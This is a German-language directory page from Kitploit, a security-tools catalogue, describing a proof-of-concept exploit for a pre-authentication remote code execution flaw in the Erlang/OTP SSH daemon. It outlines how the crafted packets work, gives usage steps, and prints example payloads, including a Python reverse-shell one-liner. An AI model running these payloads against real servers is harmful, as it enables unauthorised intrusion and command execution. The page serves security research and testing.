Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32433 — Proof-of-Concept-Exploit für CVE-2025-32433, eine Remote Code Execution (RCE) vor der Authentifizierung im Erlang/OTP-SSH-Daemon. Enthält ein Python-Skript zum Senden präparierter SSH-Kanalanfragen und zum Ausführen beliebiger Befehle. | Kitploit
Tools/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
SchwachstellenanalyseExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

Proof-of-Concept-Exploit für CVE-2025-32433, eine Remote Code Execution (RCE) vor der Authentifizierung im Erlang/OTP-SSH-Daemon. Enthält ein Python-Skript zum Senden präparierter SSH-Kanalanfragen und zum Ausführen beliebiger Befehle.

Repository anzeigen
3vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32433 – RCE-Sicherheitslücke im Erlang/OTP-SSH

📌 Zusammenfassung

CVE-2025-32433 ist eine Schwachstelle zur Remote-Codeausführung (RCE), die den Erlang/OTP-SSH-Daemon betrifft. Die Ursache ist eine unsachgemäße Behandlung von SSH-Kanalanfragen vor der Authentifizierung, die von einem Angreifer so gestaltet werden können, dass vor der Authentifizierung beliebige Befehle ausgeführt werden. Der enthaltene PoC demonstriert das Senden solcher manipulierter SSH-Pakete; standardmäßig schreibt er /lab.txt auf das Zielsystem, kann aber für andere Befehle angepasst werden.

⚠️ Haftungsausschluss: Dieses Repository dient ausschließlich Bildungs- und Forschungszwecken. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.

🛠️ Verwendung

  1. Bearbeiten Sie die Zieldaten im PoC-Skript:
root@kitploit:~
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. Führen Sie den Exploit aus:
root@kitploit:~
python3 cve-2025-32433.py

Standardmäßig erstellt er /lab.txt mit dem Inhalt pwned. Ändern Sie das Payload in build_channel_request, um eigene Befehle auszuführen.

🧩 Beispiel-Payloads

root@kitploit:~
# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 So funktioniert der PoC (kurz)

  • Stellt eine Verbindung zum SSH-Dienst her und tauscht Banner aus.
  • Sendet eine manipulierte SSH_MSG_KEXINIT, die wie ein normaler Handshake aussieht.
  • Sendet SSH_MSG_CHANNEL_OPEN und SSH_MSG_CHANNEL_REQUEST mit einem exec-Payload vor der Authentifizierung.
  • Ist das System verwundbar, führt der Server den bereitgestellten Erlang-Befehl aus.

🙏 Danksagung

Entdeckung und Dokumentation von Matt Keeley (Platform Security). Vielen Dank an ihn für die Veröffentlichung des PoC und die Bereitstellung der Details.

Blog-Link: https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 Referenzen

  • Matt Keeleys Blog
  • Erlang/OTP-Sicherheitshinweise
  • MITRE-CVE-Eintrag
Tool herunterladen